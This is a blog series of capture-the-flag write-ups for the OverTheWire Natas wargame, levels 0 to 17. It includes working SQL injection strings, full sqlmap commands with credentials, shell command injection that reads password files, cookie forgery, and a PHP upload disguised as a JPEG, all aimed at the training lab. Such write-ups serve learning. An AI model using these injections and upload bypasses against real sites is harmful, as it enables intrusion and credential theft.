DEV Community: Joon Yoo

Solving Natas 15-17

Joon Yoo — Tue, 31 Oct 2023 14:09:00 +0000

Natas Level 15

This time, we see a little login-esque box which checks if a username exists in the database or not.
Again, in the source code a query is being run

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";

Once the quotations are expanded it becomes:

SELECT * from users where username=”input”;
From what we can gather, it’s possible to use sql injection, and we could definitely brute force the password by checking each character and matching it to the username via a query that would look something like:

SELECT * from users where username=”input” and password like binary “%A%”;

However, we can use a tool called SQLmap which can do this for us automatically.
Like most web accessing scripts we need to give the tool some information so it knows what to do:

The complete call of the script is:

sqlmap --auth-type=basic --auth-cred=natas15:TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB -u http://natas15.natas.labs.overthewire.org/index.php --data="username=something" -p username --string=doesn --level=5 --user-agent=Mozilla --dbms=MySQL --threads 4 -D natas15 -T users --dump

This takes a while to run and tries to find all the vulnerabilites of the site. It is capable of doing many things, such as time delay sql injections, regular sql injections, and many other fun pen testing operations! In this case, I've used it as I was too lazy to write a brute force algorithm and kind of wanted to try the tool out.

Once the tool is done running, it left us with these results from the sql injection attacks:

Pass for next level: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V

Natas Level 16

This level is similar to Natas 9 & 10 but with even more restrictions on the input.

In Natas 9 we exploited the use of ; to cat the password file, and in Natas 10 we exploited greps built in multi search ability, but in this case this isn’t possible. The key is double quoted, and so anything we put as the key will be used as one input - thus eliminating the grep vulnerability.
However, if you’re familiar with shell you’ll know that $() can be used for command substitution, and while it can’t give us the password directly in this case - we can use it to determine certain things.

Reading the source code, we can see that our input should return a case insensitive match of our input if it’s valid.
Using command substitution, we should be able to test all the inputs for the password and have a final valid password for level 17. The key idea here is that if we use
$(grep somecharacters thepasswordfilefornatas17)
in our input, if -somecharacters- appears in the natas17 password, then the command substitution will return it’s result. This works in our favour, as we can use a regular input, and then add the command substitution. If the command works, the input gets mangled, if it doesn’t then we get a result from the website.

As the output still shows zooms, we know that “a” is not in the password.

As the output shows nothing, we know that x is in the password.
We brute force all the possible combinations of numbers and letters and then go through all of those to try and find the password by testing strings and not just single characters. We find all the possible characters first to reduce the time complexity of the solution as testing all the characters would take a lot longer than a smaller subset.
This is the python script I wrote for this.

The result of running the script was this:
(It took around 30 minutes, I went to eat some food while the script ran)

Pass for next level: XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd

Natas Level 17

This level is similar in appearance to level 15. Level 15 was exploitable via brute forcing sql injections to figure out the password. However, in this level we don’t have the ability to check text output as all the outputs have been commented out, and so checking usernames results in an empty result.

Typically we would use a time delay sql injection attack, where we use an sql query combined with a sleep function. When the sql returns a query, we && a delay function and then we test the time taken for our queries to return.

The query returns a result before our expected time => it didn’t work

The query returns a result after our expected time => it did work

This is the philosophy of how the time delay sqli works. There are some drawbacks, like network delays and things that could cause issues, but these can be overcome by simply increasing the time delay that is used (with the obvious drawback being a slower attack).
I decided to use the sqlmap tool again in a similar way to level 15 to get myself familiar with using pen testing tools, but it is entirely possible to write a python script which does the same thing I’m doing and probably faster as well. This is because sqlmap detects the vulnerability in the website and then performs multiple attacks.

sqlmap --auth-type=basic --auth-cred=natas17:XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd -u http://natas17.natas.labs.overthewire.org/index.php --data="username=something" -p username --level=5 --user-agent=Mozilla --dbms=MySQL --threads 1 -D natas17 -T users --dump

In this query, we removed the string to check for as nothing gets returned, and we ensure that only 1 thread is used, as multiple threads can increase false positives/negatives as it’s hard to account for thread switching in the time count.

After 2 hours, we get the results for the passwords. As sqlmap goes through all the passwords/usernames it can take a long time if all the passwords are long strings like in this example.

Pass for next level: 8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq

What I learnt
These levels were quite difficult to do. However it was great fun to learn about time delay basde sql attacks and how time consuming they can be due to network interruptions. Many of these solutions involved brute force attacks, and writing up my own script for level 16 was fun as it has been a while since I used python for anything.

Solving Natas Levels 11-14

Joon Yoo — Tue, 31 Oct 2023 13:49:18 +0000

Natas Level 11
This level opens up with a simple background color changing application.

We have access to the source code again, so upon reading it we see that default data is loaded using a loadData function.

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); $data = loadData($defaultdata);
The load data function accesses the cookie, loads it into the mydata variable and checks if the cookie has the key "data".
If it does, it stores a base64 decoded, custom xor encrypted, json decoded version of the cookie data in the variable temp data. Then it checks if the tempdata variable is an array with key "showpassword" and "bgcolor". If it does, it checks if the bgcolor matches the format of a hexcode (#123456) and if it does, then it moves the information in the tempdata to the mydata variable and returns it.

For us to return an altered version of the mydata variable, a couple things must be true:

The cookie has the "data" key in it
The 3 function encrypt/decode of the cookie "data" must be an array
The array must have a key showpassword and bgcolor
The bgcolor value must match the format of a hexcode

It appears that what we need to do is change the cookie in such a way that once it comes out of the three function enrypt/decode, it results in an array that has a key “showpassword” set to true, and a bgcolor key that is set to some hexcode.
Luckily for us, json_decode and base64_decode have their respective encode functions built into php so we just need to use the associated function. So let’s take a deeper look into how we can decrypt the xor function.
xor functions are associative and transitive, this means that if:

A xor B = C, then
A xor C = B, and
C xor A = B, and so on.

In this case, we have a key, text and an output text. We can apply similar principles here to find the key that the xor function is using so we can manipulate the output text in our favor.
IN xor KEY = OUTPUT, then
IN xor OUTPUT = KEY
Since we know that the input will be the base64 decoded cookie, and our output will be the json encoded array. To get the cookie from our site, we go to the dev tools and enter document.cookie into the console and copy the data we get.
Cookie = MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY

After running this function, it returns:
KNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLK
With xor functions, if one value is shorter than the other it begins to repeat the key and - so we can determine that our key is ‘KNHL’. Now using this information, we want to have an array with key showpassword set to yes and a valid bgcolor hexcode. Applying the principle we learnt about earlier, we can assume:
ARRAY xor KEY = COOKIE

As explained earlier, we reverse what happens to the cookie data to get a valid cookie holding our required information. Now we just need to set our cookie to the cookie that comes out of this function:
MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz
We can do this by going to the dev tools again and typing
document.cookie=”data=thecookieyougot”
Upon refreshing the page with our new cookie:

Pass for next level: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG

Natas Level 12

We are presented with a simple page to choose and upload a file. Reading the source code, we can see that it lets us upload jpeg files to the site and then does a couple things to it.
The important thing to note is that once it's there, it generates a link to the image and displays it on the site. This probably means that if we get php code and pretend it's a jpeg file, we will be able to run it when the link displays.

First, we’ll create a fake jpg that will echo the password for the next level as we have done in previous levels by peeking into the webpass folder.

This creates a jpg which contains php code that reads out the password file.
Uploading this to the website results in a clickable link that doesn’t do much.

To make this link do something, we can probably change the extension of our file to .php so that the browser runs our code! We can do this by editing the file extension in the dev tools then uploading it which gives us a link that prints out the password stored for the next level

Pass for next level: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9

Natas Level 13

Now the site checks if the file uploaded is actually an image using the exif_imagetype function. Reading the documentation, this function reads the first bytes of an image and checks its signature. A value of 2 signifies a jpeg type, so we just need to prepend some bytes of information into our file to bypass the function. I did this using hexedit, but any tool to modify the bytes of a file will work here.
After a quick search I found that I needed to edit the first 4 bytes to
FF D8 FF DB as this is the bytes used for raw jpeg files.
I added 4 characters to my image file so I can change them using hexedit.

I uploaded the image, changed its extension and received the password for the next level!
Pass for next level: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP

Natas Level 14

We open up to a login screen. In the source code it’s made apparent that there is a mysql database.
The query that is called looks like this:

SELECT * from users where username=”input” and password=”input”;

The code then checks if any rows have been returned from the database. We can do a simple sql injection which will ensure that a row will always return like so:

SELECT * from users where username=”” or “”=”” and password=”” or””=””;

This works because the query or “”=”” is always true. As the regular query already includes double quotations for us, we need to add " or ""=" to get the query we want.

Upon clicking login, we are through to the next level.
Pass for next level: TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB

What I learnt
It was really fun getting to do some of the sql injections, as I've always heard about it - but never had the chance to do them. I learnt about how some verification methods work, like the exif_image checking bytes of a file. I also learnt that since code can be run on websites, many languages run on the web like: javascript, php and java can be exploited.

Solving Natas Levels 7-10

Joon Yoo — Tue, 31 Oct 2023 13:29:29 +0000

Natas Level 7
The level opens up with two buttons, Home and About. Upon my previous readings about php, I've been made aware that php injections exist. Simply by changing the url, you can access different php pages, functions, etc. In this case there was a clue left in the comments that accessing /etc/natas_webpass/natas8 would return a password, so I just entered that into the ?page= query and boom
pass for next level: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB

Natas Level 8
Similarly, this level opens up with an input secret screen. This time, as I read about before, the secret is encoded via a function written in the php script.

Reading the encodeSecret function, I can just reverse what it’s doing to decode the secret.

Steps to decode:

Hex2bin
Reverse string
Base64_decode

Following those steps and putting the result into the input box worked!
pass for the next level: Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd

Natas Level 9

Looking into the source code we see that there is another php function that we can exploit!

I wasn’t sure if it would sanitize the input, so I tried a bunch of things. At the end of it I remembered back to when I solved Narnia 0 (a different overthewire wargame) and I used ; to send multiple commands in, noticing that it was using shell commands, I considered trying something a bit more useful than grep.

Bingo, now from what I remember from previous levels - the passwords are stored in a particular folder, so I used cat to try and find it by entering: ; cat /etc/natas_webpass/natas10
pass for next level: D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE

Natas Level 10

Upon reading the sourcecode, it seems that they are checking the input using preg_match - a simple regex matching function for php.

I won’t be able to use command injection anymore to just cat the file containing the password. Now we can try to attack the weakest thing there which is the part that lets us use user input! The key changes depending on what we input, for example, when using the search term ‘africa’ - grep searches for words that contain africa, and does it while ignoring cases due to the -i flag.

Reading the grep man page, we can see that multiple files can be searched at once!

This means we can likely use grep to expose the password for us again by searching the /etc/natas_webpass/level11. However, since we’re using grep, we’ll need to use our input to try and guess letters in the password for it to spit it out. We’ll guess using a, so our input should look like
Input: a /etc/natas_webpass/level11
We know that the grep input worked, as it is now specifying the files from which grep is pulling text from.
Luckily, the password contained the letter ‘a’ so we are in!
Pass for next level: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg

What I learnt
I have previously learnt about shell from one of my classes in university, but it was never used in an exploitative manner. Seeing these tools be used in this way taught me that even things designed to help people can be used in damaging ways. Something that has been taught to me in class is that developers should whitelist and not blacklist. Alot of these levels involve some form of blacklisting, and the vulnerability is in exploiting something that wasn't included in the blacklist.

Solving Natas Levels 4-6

Joon Yoo — Tue, 31 Oct 2023 07:34:51 +0000

Natas Level 4

Upon opening the level, you see this. I was initially confused and refreshed the page, giving me a big hint.

I thought for a bit, and wondered if there was some information being sent to the site that could inform it of my "previous website". I tried things like visiting google.com and then entering in the natas4 site which didn't work, and so that brought the idea that possibly some information is being directly sent to natas4. I did some googling and came across 'http refering' which made a lot of sense. I tried to figure out ways I could "give" natas4 a http referer, and I knew of curl which could help transfer data to the site and back without me having to download any extra tools. After a bit of googling and documentation reading, I learnt that the http referer could be sent in the request to a page like so:

After realising this worked, actually getting the password just required me to trial and error a bit to actually type in the natas5 link in properly.
pass for next level: Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD

Natas Level 5

When logging into natas 5, I was greeted with an "access denied, user not logged in" which was funny since I just had to enter in a password. But considering this was a puzzle, I got to thinking and considered what that message could possibly mean. Maybe I needed to log in somewhere, or maybe I needed to use different login credentials for this site which could be hidden in the page?? After going through a couple things, it almost felt like Jesus spoke to me "COOKIES, THE ANSWER IS COOKIES". I pondered it a bit, and then realised that cookies was likely part of the solution. I had never dealt with cookies properly before besides always pressing the reject all button, so as with almost every level before this: I went to google and seached some stuff up. Basically I wanted to know how I could see the cookies that were being sent to the page, and how I could send my own to the page (hopefully) using curl. Funnily enough, searching something along those lines basically gave me the answer as curl is quite a powerful tool. The -c and -b flags came in useful, -c showing me the cookies, and -b letting me send my own cookies.
Using the -c flag, I found that the cookie name was "loggedin" and was set to a value of "0"
curl --user natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD -c - 'http://natas5.natas.labs.overthewire.org'Using the -b flag I set this value to 1 and sent it to the site
curl --user natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD -b "loggedin=1" 'http://natas5.natas.labs.overthewire.org'After sending in my very own cookie, curl basically just spat out the password
pass for next level: fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR

Natas Level 6
This level was interesting, it opens up to a page with a new format. An input secret button. After clicking the button to open the source code I saw some html and this mystery langauge. The actual solution wasn't complex,
but I did scratch my head trying to figure out what language the input secret button was written in, turns out the html tag <? ?> was for php and I went into a rabbit hole trying to determine what that meant, but as it turns out - it was a red herring and I needed to look at the include statement, which I seem to always forget means that there is a filesystem available.

Upon accessing the includes/secret.inc path, it spits out a secret that I can enter on the home page and get the password to the next level!
pass for next level: jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr

What I Learnt
I'm kind of shocked at how much a "game" can teach me about the web. Before I did these levels, I only had vague ideas of cookies and curl as a cli. Now, although I wouldn't say I'm a pro by any means, I have more confidence in searching/reading documentation on how to use tools and understanding simple web structure. Once I was in the groove of thinking like an attacker and trying to "abuse" the site, I found it easier to keep trying different things and found a hunger for information that could help me solve the puzzle.

Solving Natas Levels 0-3

Joon Yoo — Tue, 31 Oct 2023 06:59:55 +0000

Hello all! This is a series of blog posts outlining my solutions to the "OverTheWire" wargame Natas. I'll also be adding my thoughts/things I learnt after each level, so hopefully there's more to learn than just how to capture the flag :D

Natas Level 0
This was an introductory problem and solving it just requires you "inspect element" the page. The password is hidden as a html comment.
pass for next level: g9D9cREhslqBKtcA2uocGHPfMZVzeFK6

Natas Level 1
Following similar ideas, except now right clicking was blocked. Using the F12 shortcut to open the dev tools revealed the password as a html comment like last time.
pass for next level: h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7

Natas Level 2
This level is a bit trickier than the last two, but all you need to know is that the image is a big hint. It reveals that there is a file system that can be routed to. The path of the image was from /files, so by accessing the /files route, a text document is revealed containing the password to the next level.
pass for next level: G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q

Natas Level 3
This level hints at how the site might be hidden from a search engine. After some research, I learnt about robot meta tags which could instruct search engines to not show the page, but as mentioned previously: "Header info isn't part of the solution". Flowing off this tangent, I searched about robot meta tags and came across robots.txt files which store user agents and can enforce certain user rules. In this case there was a wild card user agent dissallowing the /s3cr3ts route. Upon visiting this route, the password is made available.
pass for next level: tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

What I learnt
These were the introductory problems, so I didn't have too much issue solving them - though I did learn about file systems and the robot meta tag/txt files! It was interesting to see how simple things can become vulnerabilities.